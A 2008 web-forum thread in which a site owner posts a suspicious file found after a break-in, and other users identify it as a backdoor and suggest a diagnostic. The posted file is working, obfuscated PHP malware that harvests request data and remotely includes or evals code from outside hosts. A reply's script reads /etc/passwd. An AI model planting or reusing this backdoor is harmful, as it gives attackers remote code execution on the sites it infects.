Page 1 of 1

HELP I've been hacked!

Posted: Tue Apr 29, 2008 6:40 pm
by wwmmww
I found this strange file. Does this look suspicious to anyone?? (it does to me!). Thanks to anyone who can advise.

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

Re: HELP I've been hacked!

Posted: Wed Apr 30, 2008 12:16 pm
by Mordred
Yep, a backdoor.
You should be more concerned about how it got there (although at least one of the related hosts appears to be online).

Re: HELP I've been hacked!

Posted: Thu May 01, 2008 7:45 am
by Chris Corbyn
Are you on a shared hosting plan? What host are you with?

Run this script and see if you get a generic username output:

Code: Select all

<?php
 
$uid = getmyuid();
if (is_file('/etc/passwd')) {
  $lines = file('/etc/passwd');
  foreach ($lines as $line) {
    if (preg_match('/:' . preg_quote($uid) . ':/', $line)) {
      $data = explode(':', $line);
      printf("Server is using user '%s'", array_shift($data));
      break;
    }
  }
} else {
 printf("Unable to determine username");
}
That script isn't dangerous. It tries to look up the username of the UID apache is running under. If the server is a windows server, or a *nix variant which doesn't use /etc/passwd then it won't work.

If the user is anything like "apache", "http", "nobody", "www" etc then it's highly probably all the other users on that server have free and easy access to your files.